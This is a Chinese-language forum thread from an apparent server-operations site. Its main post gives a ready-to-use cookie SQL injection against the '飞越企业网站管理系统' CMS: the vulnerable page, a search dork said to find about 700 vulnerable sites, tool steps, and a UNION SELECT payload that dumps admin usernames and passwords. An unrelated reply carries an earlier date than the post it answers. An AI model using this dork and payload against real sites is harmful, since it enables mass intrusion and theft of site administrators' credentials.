服务器维护,服务器代维,安全设置,漏洞扫描,入侵检测服务

运维之家

 找回密码
 注册
搜索
查看: 5885|回复: 5

飞越企业网站管理系统cookie注入漏洞

[复制链接]
dirtysea 发表于 2008-11-14 23:18:43 | 显示全部楼层 |阅读模式

注入页面:http://localhost/fyqy/shownews.asp

搜索关键词:"inurl:Imagebig_honor.asp"  有洞站达700个

利用方法:

 

1、利用职桂林老兵cook修改工具,在地址栏写入:http://localhost/fyqy/shownews.asp,点连接(localhost,换为相应的网址)

2、点小金锁,在cookie栏写入注入语句:id=39+and+1+like+1+union+select+1,username,password,4,5,6,7,8,9,10,11+from+admin    (id=后面的39,是新闻的ID值,可以打开页面找,如果是不存在的值,则可能会出现数据连接错误的提示,请查看自行修改吧!)

3、点两次刷新,成功爆出密码

新疆人胡胡 发表于 2006-6-15 23:13:33 | 显示全部楼层

re:飞越企业网站管理系统cookie注入漏洞

你是不是有上面的一种还是好几种禁忌了???

哈哈哈哈.

您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|小黑屋|手机版|Archiver|运维之家

GMT+8, 2024-4-26 08:31 , Processed in 0.187383 second(s), 14 queries .

Powered by Dirtysea

© 2008-2020 Dirtysea.com.

快速回复 返回顶部 返回列表